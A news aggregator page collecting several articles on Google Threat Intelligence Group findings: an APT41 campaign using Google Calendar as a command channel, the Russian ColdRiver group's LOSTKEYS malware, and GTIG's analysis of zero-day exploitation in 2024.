Latest news with #GTIG
Mint
3 days ago
- Mint
Google uncovers malware campaign by China-linked hackers using Calendar events in a sophisticated cyberattack
In a concerning revelation, Google's Threat Intelligence Group (GTIG) has uncovered that a group of hackers linked to China used Google Calendar as a tool to steal sensitive information from individuals. The group, known as APT41 or HOODOO, is believed to have ties to the Chinese government. According to GTIG, the attack began with a spear phishing campaign. This method involves sending carefully crafted emails to specific targets. These emails included a link to a ZIP file hosted on a compromised government website. Once the victim opened the ZIP file, they would find a shortcut file disguised as a PDF and a folder with several images of insects and spiders. However, two of these image files were fake and actually contained malicious software. When the victim clicked the shortcut, it triggered the malware and even replaced itself with a fake PDF that appeared to be about species export regulations, likely to avoid suspicion. The malware worked in three steps. First, it decrypted and ran a file named PLUSDROP in the computer's memory. Then, it used a known Windows process to secretly run harmful code. In the final stage, a program called TOUGHPROGRESS carried out commands and stole data. What made this attack unusual was the use of Google Calendar as a communication tool. The malware created short, zero-minute events on specific dates. These events included encrypted data or instructions hidden in their description field. The malware regularly checked these calendar events for new commands from the hacker. After completing a task, it would create another event with the stolen information. Google said the campaign was discovered in October 2024 after it found malware spreading from a compromised government website. The tech company has since shut down the calendar accounts used by the hackers and removed other parts of their online infrastructure. To stop similar attacks in the future, Google has improved its malware detection systems and blocked the harmful websites involved. It also alerted organisations that may have been affected and shared technical details to help them respond and protect themselves.
Yahoo
11-05-2025
- Yahoo
Google exposes new Russian spyware virus LostKeys linked to FSB
Google has announced (via Android Headlines) the discovery of new Russian spyware called LostKeys, which is used by the ColdRiver hacker group linked to the Russian Federal Security Service (FSB). The software is designed to steal files and system data from Western organisations. Source: Mezha Media, a technology and IT news platform within Ukrainska Pravda's holding company Details: The Google Threat Intelligence Group (GTIG) reports that LostKeys is used in targeted ClickFix attacks, based on social engineering and beginning with a fake CAPTCHA. Victims are deceived into running malicious PowerShell scripts, allowing additional malware to be downloaded and executed. The primary aim is to install LostKeys, which functions like a digital vacuum cleaner, extracting files, directories and system information. Hackers also deploy other malware, particularly SPICA, to retrieve documents. The ColdRiver Group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since Russia invaded Ukraine. The group specialises in cyber-espionage, targeting government and defence institutions, think tanks, politicians, journalists and non-governmental organisations. The United States has imposed sanctions on individual group members and announced a US$10 million reward for information leading to their arrest. Google experts emphasise the need to strengthen cybersecurity, especially for organisations that could become potential victims of ColdRiver attacks. They recommend using Google's advanced protection and regularly updating security systems to counter such threats. Support Ukrainska Pravda on Patreon!
Mint
07-05-2025
- Politics
- Mint
Google uncovers ‘LOSTKEYS' malware linked to Russian-backed Cold River hackers
Google has uncovered a new strain of malware, dubbed "LOSTKEYS", believed to be the work of Cold River, a Russian-aligned hacking group reportedly connected to the country's Federal Security Service (FSB), reported Reuters. According to a blog post published on Wednesday by Google's Threat Intelligence Group (GTIG), the newly identified malware represents a significant advancement in Cold River's cyber capabilities. LOSTKEYS is designed to steal files and transmit system data back to its operators, expanding the group's known toolkit for espionage. Wesley Shields, a researcher at GTIG, stated that the malware signals 'a new development in the toolset' used by the group, which has a history of targeting sensitive political and strategic entities. Cold River, also known under various aliases, has been linked to previous cyber operations aimed at high-profile Western individuals and institutions. The group's primary mission, experts say, is the collection of intelligence that furthers Russian geopolitical interests. Recent surveillance by Google's researchers shows that, between January and April 2025, Cold River targeted advisers—both current and former—to Western governments and military institutions. Other victims reportedly included journalists, international think tanks, non-governmental organisations, and individuals associated with Ukraine. The Russian embassy in Washington has yet to respond to requests for comment on the allegations. Cold River has previously drawn attention for its audacious operations. In mid-2022, the group was accused of targeting three nuclear research facilities in the United States. Later that year, it was implicated in the leaking of private emails belonging to former British intelligence chief Sir Richard Dearlove, alongside other individuals associated with pro-Brexit activities. Cybersecurity analysts warn that the emergence of LOSTKEYS underscores a broader escalation in cyber espionage tactics being employed by state-linked actors. Google has urged targeted organisations and individuals to remain vigilant and adopt updated security measures to mitigate potential risks.
Scoop
01-05-2025
- Business
- Scoop
Enterprise Security In The Crosshairs: Google Reveals Key Zero-Day Exploitation Trends For 2024
Press Release – Google Threat Intelligence Group – GTIG Security & networking products are emerging as prime targets because of the far-reaching access they offer, the report states. 20 of the 33 enterprise-focused vulnerabilities identified in 2024 were in these categories, including widely used platforms from … The Google Threat Intelligence Group (GTIG) has released its latest annual analysis of zero-day vulnerabilities, revealing a shift in cybercriminal focus toward enterprise technologies, while overall zero-day exploitation remains on an upward trend. In its report 'Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis,' GTIG tracked 75 zero-day vulnerabilities that were exploited in the wild last year. While that figure marks a decrease from 98 in 2023, it remains higher than the 63 vulnerabilities recorded in 2022—continuing a four-year trend of gradual growth. A zero-day is defined as a software vulnerability that is exploited before the affected vendor has released a patch. These flaws are highly sought after by both nation-state actors and financially motivated cybercriminals due to the stealth and system access they can provide. Enterprise Tech in the Firing Line In a notable shift, 2024 saw a significant increase in zero-day exploitation targeting enterprise-focused technologies. These include security software, network appliances, and business infrastructure tools. GTIG found that 44% of all tracked zero-days in 2024 targeted enterprise technologies—up from 37% in 2023. 'Security and networking products are emerging as prime targets because of the far-reaching access they offer,' the report states. Twenty of the 33 enterprise-focused vulnerabilities identified in 2024 were in these categories, including widely used platforms from Ivanti, Palo Alto Networks, and Cisco. While the absolute number of exploited enterprise vulnerabilities dropped slightly from the previous year, the proportional increase signals a deeper trend: attackers are prioritising systems that offer expansive access and limited monitoring, particularly where endpoint detection tools may not be effective. Browsers and Mobiles See Decline In contrast, the report observed a marked decrease in zero-day exploitation of browsers and mobile devices—down by about one-third and one-half respectively. Exploitation of the Chrome browser remained most common among end-user platforms, with Android devices continuing to be compromised via flaws in third-party components. Microsoft Windows saw a continued rise in exploitation, with 22 zero-days tracked in 2024, compared to 16 in 2023 and 13 in 2022. GTIG anticipates that Windows will remain a persistent target due to its dominance across home and professional environments. Espionage Remains a Driving Force Of the 75 zero-day vulnerabilities tracked, GTIG was able to attribute 34 to specific threat actors. Over half of these (18 vulnerabilities) were tied to espionage operations—either from nation-state groups or clients of commercial surveillance vendors (CSVs). Chinese-backed groups were linked to five exploits, focusing almost exclusively on security and network devices, while North Korean actors matched that number for the first time, combining espionage with financially motivated campaigns. Meanwhile, forensic surveillance tools developed by vendors such as Cellebrite were linked to chains of zero-day exploits requiring physical access to mobile devices, reinforcing concerns around the misuse of commercial spyware technologies. Financial Motivation Still Present Although espionage operations dominate attribution, financially driven actors also played a notable role. Groups such as the suspected FIN11 cluster were linked to multiple attacks on enterprise file transfer systems, using zero-days to conduct data theft and extortion. A Call for Greater Vendor Vigilance While some historically popular targets saw fewer attacks in 2024, the report emphasises that this is not necessarily a sign of safety. Rather, it may reflect the growing effectiveness of vendor mitigation strategies, and a redirection of attacker focus to areas with less robust defences. 'Attackers continue to exploit well-known classes of vulnerabilities—such as command injection, use-after-free, and cross-site scripting—highlighting the need for stronger coding standards and preventative practices,' GTIG said. With enterprise vendors now more frequently in the crosshairs, Google urges all technology providers to evolve their security postures, especially those offering products that serve as central infrastructure within business environments. The full report, including in-depth technical analysis and recommendations for defenders, is available on the Google Threat Intelligence blog. A companion webinar is scheduled for later this month, offering further insight into these findings.
Yahoo
01-05-2025
- Yahoo
Government hackers are leading the use of attributed zero-days, Google says
Hackers working for governments were responsible for the majority of attributed zero-day exploits used in real-world cyberattacks last year, per new research from Google. Google's report said that the number of zero-day exploits — referring to security flaws that were unknown to the software makers at the time hackers abused them — had dropped from 98 exploits in 2023 to 75 exploits in 2024. But the report noted that of the proportion of zero-days that Google could attribute — meaning identifying the hackers who were responsible for exploiting them — at least 23 zero-day exploits were linked to government-backed hackers. Among those 23 exploits, 10 zero-days were attributed to hackers working directly for governments, including five exploits linked to China and another five to North Korea. Another eight exploits were identified as having been developed by spyware makers and surveillance enablers, such as NSO Group, which typically claim to only sell to governments. Among those eight exploits made by spyware companies, Google is also counting bugs that were recently exploited by Serbian authorities using Cellebrite phone-unlocking devices. Even though there were eight recorded cases of zero-days developed by spyware makers, Clément Lecigne, a security engineer at Google Threat Intelligence Group (GTIG), told TechCrunch that those companies 'are investing more resources in operational security to prevent their capabilities being exposed and to not end up in the news.' Google added that surveillance vendors continue to proliferate. 'In instances where law enforcement action or public disclosure has pushed vendors out of business, we've seen new vendors arise to provide similar services," James Sadowski, a principal analyst at GTIG, told TechCrunch. "As long as government customers continue to request and pay for these services, the industry will continue to grow.' Do you have more information about government hacking groups, zero-day developers, or spyware makers? From a non-work device and network, you can contact Lorenzo Franceschi-Bicchierai securely on Signal at +1 917 257 1382, or via Telegram and Keybase @lorenzofb, or email. The remaining 11 attributed zero-days were likely exploited by cybercriminals, such as ransomware operators targeting enterprise devices, including VPNs and routers. The report also found that the majority of the total 75 zero-days exploited during 2024 were targeting consumer platforms and products, like phones and browsers, while the rest exploited devices typically found on corporate networks. The good news, according to Google's report, is that software makers defending against zero-day attacks are increasingly making it more difficult for exploit makers to find bugs. "We are seeing notable decreases in zero-day exploitation of some historically popular targets such as browsers and mobile operating systems,' per the report. Sadowski specifically pointed to Lockdown Mode, a special feature for iOS and macOS that disables certain functionality with the goal of hardening cell phones and computers, which has a proven track record of stopping government hackers, as well as Memory Tagging Extension (MTE), a security feature of modern Google Pixel chipsets that helps detect certain types of bugs and improve device security. Reports like Google's are valuable because they give the industry, and observers, data points that contribute to our understanding of how government hackers operate — even if an inherent challenge with counting zero-days is that, by nature, some of them go undetected, and of those that are detected, some still go without attribution.
